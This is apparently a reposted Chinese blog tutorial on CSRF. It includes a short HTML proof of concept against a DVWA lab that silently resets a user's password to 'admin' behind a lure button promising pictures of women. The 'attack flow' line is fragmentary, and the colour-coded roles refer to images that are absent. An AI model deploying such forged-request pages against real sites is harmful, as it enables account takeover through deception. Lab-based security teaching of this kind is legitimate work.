csrf的攻击流程和原理,以及对人民带来多大危害
Posted 黑客渗透测试技术
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了csrf的攻击流程和原理,以及对人民带来多大危害相关的知识,希望对你有一定的参考价值。
我们大家好,好久没有更新内容是因为这几天太忙,实在抱歉,今天抽点时间出来给大家更新一条文章,这篇文章主要内容的主角:“csrf”相信在有人听说过,但是不知道如何去使用,当然我们做渗透测试目的不是为了去攻击别人,这是违法的,还是遵守国家法律为好。
角色:小马----小明----黑客
红色代表受害者-----绿色代表好人-----黑色代表坏人
攻击流程:狗估计
如何防范 csrf:不要随便点开陌生 的链接,比如电子邮件,移动短信链接...
下面我来做个实例演示,
<html><body><script>history.pushState('', '', '/')</script><form action="http://192.168.41.145/dvwa/vulnerabilities/csrf/"><input type="hidden" name="password_new" value="admin" /><input type="hidden" name="password_conf" value="admin" /><input type="hidden" name="Change" value="Change" /><input type="submit" value="美女图片点击查看" /></form></body></html>
上面是我简单写出的csrf代码页面,为了大家更容易理解,代码很简单,一看就明白,简单的这些代码却固有你们想不到的威力,拿这个页面想让别人点开是不可能的,我是测试页面,不必要加太多东西,想拿去诱惑别人点击。真正操作起来是看不出任何破绽,页面很诱惑。当然这是一个修改密码的表单页面,当把代码保存文件名为csrf后缀名为html,接下来我们打开看看是什么效果。
以上是关于csrf的攻击流程和原理,以及对人民带来多大危害的主要内容,如果未能解决你的问题,请参考以下文章